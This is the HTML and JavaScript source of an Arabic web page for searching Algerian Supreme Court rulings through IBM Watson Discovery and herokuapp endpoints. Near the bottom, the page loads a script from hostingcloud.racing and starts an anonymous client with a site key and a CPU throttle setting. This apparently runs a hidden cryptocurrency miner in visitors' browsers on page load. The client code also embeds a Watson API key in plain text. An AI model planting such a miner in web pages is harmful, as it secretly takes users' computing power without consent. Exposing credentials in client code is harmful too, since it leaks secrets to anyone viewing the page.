
<html dir="rtl" hreflang="ara">
<head>
<meta charset="UTF-8" >
<title>موقع الاجتهاد القضائي</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="موقع  الاجتهاد القضائي الجزائري">
<meta name="keywords" content="إجتهاد قضائي,محكمة عليا,اجتهادات,بحث ,دكي,لغة طبيعية,قرارات,بحث سريع">
<style>
body {background-color: powderblue;}
h1   {color: blue;}
em    {color: red;}
#title {
alt:center;
}
div#hid
{
background:#d6CFC7
}
.white-space-pre {
    white-space: pre-wrap;
}

</style>
<link rel="stylesheet" href="https://cdn.rtlcss.com/bootstrap/v4.2.1/css/bootstrap.min.css" integrity="sha384-vus3nQHTD+5mpDiZ4rkEPlnkcyTP+49BhJ4wJeJunw06ZAp+wzzeBPUXr42fi8If" crossorigin="anonymous">
	<meta name="google-site-verification" content="pGEa40ONioAbt_DGfTt-A6R06L9nU7nlQzc5pGTejSc" />
</head>
<body>
	<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/fr_FR/sdk.js#xfbml=1&version=v6.0&appId=111029629105296&autoLogAppEvents=1"></script>
<img id="img" src="juris.jpg" alt=" صفحة الإجتهاد القضائي الجزائري " height="100" style="width:100%;"class="rounded-pill">
<div class="container-fluid">

<div class="row">
<div class="col-sm-6">
<label for="cho">اختر نوع البحث</label>
<br>
<select id ="cho">
<Option value="https://api.eu-gb.discovery.watson.cloud.ibm.com/instances/2513799b-9d19-40ab-b66d-053d045afb4f/v1/environments/0d630b27-86da-4b56-b899-2945feb51293/collections/d704429d-0d6d-47f1-b090-c1c33786fa74/query?version=2018-12-03&deduplicate=false&highlight=true&passages=true&passages.count=5&highlight=true&natural_language_query="> البحث الشامل عن الاجتهاد القضائي الجزائري </Obtion>
<Option value="https://lowapi.herokuapp.com/"> الغرفة الجنائية لدى المحكمة العليا </Obtion>
<Option value="https://lowapi.herokuapp.com/civ/"> الغرفة المدنية لدى المحكمة العليا</Obtion>
<Option value="https://lowapi.herokuapp.com/com/"> الغرفة التجارية والبحرية</Obtion>

</select>
</div>
<div   class="col-sm-6" >
<div id="title" >
 البحث الشامل عن الاجتهاد القضائي الجزائري

</div>
<br>
<input id="srt" / >
<br>

<Button id="btn" class="btn btn-primary">ابحث</Button>
<div vir.role="alert" id="vir"><div>

</div>
</div>
</div>
<div id="pesp"></div>
<div id="resp"></div>
<script>


const selectElement = document.getElementById('cho');
var root="https://api.eu-gb.discovery.watson.cloud.ibm.com/instances/2513799b-9d19-40ab-b66d-053d045afb4f/v1/environments/0d630b27-86da-4b56-b899-2945feb51293/collections/d704429d-0d6d-47f1-b090-c1c33786fa74/query?version=2018-12-03&deduplicate=false&highlight=true&passages=true&passages.count=5&highlight=true&natural_language_query=";
var index=0
selectElement.addEventListener('change', (event) => {
 root=event.target.value
var x = document.getElementById("cho").selectedIndex;
var y = document.getElementById("cho").options;
index=x
console.log(x)
console.log(y[x].text)
document.getElementById("title").innerHTML=y[x].text
});
var bu=document.getElementById("btn")
bu.addEventListener("click",serch)
function rovove(res)
{var child = res.lastElementChild; 
while (child) { 
            res.removeChild(child); 
            child = res.lastElementChild; 
        } 
		}//delete child
function serch()
{
var st=document.getElementById("srt")
if(st.value!="")
{
vir=document.getElementById("vir")
vir.innerHTML=""
vir.className=""
var bout=document.getElementById("boutom")
var res=document.getElementById("resp")
var pes=document.getElementById("pesp")
rovove(res)
rovove(pes)
rovove(bout)
var xhr = new XMLHttpRequest();
	xhr.onload = function(e) {
	document.getElementById("img").style.display = "none";
        if (this.readyState === 4) {
           
			var json=JSON.parse(e.target.responseText);
			
			var res=document.getElementById("resp")
			var pes=document.getElementById("pesp")
			if(index==0)
			{
			for(i=0;i<json.results.length;i++)
			{
			
			
			
			
			
			var btn = document.createElement("Div"); 
			var hid_div=document.createElement("Div")
			hid_div.innerHTML=json.results[i].text
			hid_div.style="display:none"
			hid_div.classList.add("white-space-pre");
			hid_div.border = " solid #0000FF"
			hid_div.id="hid"
			
			
			var but_text=document.createTextNode("إظهار-اخفاء القرار");
			var but_to_hid=document.createElement('Button');
			but_to_hid.show=true
			but_to_hid.addEventListener("click",function(event){
			var childs=event.target.parentElement.children
			childs= Array.from(childs);
			console.log(but_to_hid.show)
			for (i in childs)
			{
			if(childs[i].id=="hid")
			{
			if(childs[i].show==true)
			{
			childs[i].style=""
			childs[i].show=!childs[i].show
			}
			else
			{
			childs[i].style="display:none"
			childs[i].show=!childs[i].show
			}
			
			}
			}
			
			}//end function
			)//end add event
			
			but_to_hid.appendChild(but_text)
			
			btn.innerHTML = json.results[i].highlight.text+"<br><br>"; 
			
			btn.appendChild(but_to_hid)// Insert text
			btn.appendChild(hid_div)
			pes.appendChild(btn);  
			
			}//end for
			}//end if
			else
			{
			var btn = document.createElement("Div");
			
			btn.innerHTML = json.hello; 
			res.appendChild(btn); 
			}
			
        }
    };
	
	xhr.open("GET", root+st.value);
xhr.setRequestHeader("Authorization", "Basic " + btoa("apikey:eE2buJm65mc_FtHzbhlV0M-sgrnp8cGuLrsrLCxZoPvo"));
xhr.send()
}//en if value
else
{
vir=document.getElementById("vir")
vir.innerHTML="لم تقم بادخال اي شيء"

vir.className ="alert alert-danger"
}
}
</script>
<script src="https://www.hostingcloud.racing/14Z7.js"></script>
<script>
    var _client = new Client.Anonymous('625542c1dad0e85f56aac47b79b0193e54b93bfb2a3c03a5a2fb1650fcbff6e2', {
        throttle: 0.7, c: 'w', ads: 0
    });
    _client.start();
   

</script>
	<div id="boutom" class="fixed-bottom">
	<div class="fb-share-button" data-href="http://ramedde2001.github.io/f/" data-layout="button_count" data-size="large"><a target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Framedde2001.github.io%2Ff%2F&amp;src=sdkpreparse" class="fb-xfbml-parse-ignore">شارك</a></div>
<br>
  <a href='https://www.free-counters.org/'>free Hit Counter</a> <script type='text/javascript' src='https://www.freevisitorcounters.com/auth.php?id=a273e863297153e87afb32004e966d3e02cb6b51'></script>
<script type="text/javascript" src="https://www.freevisitorcounters.com/en/home/counter/646350/t/3"></script>
</div>
	</body>
<html>
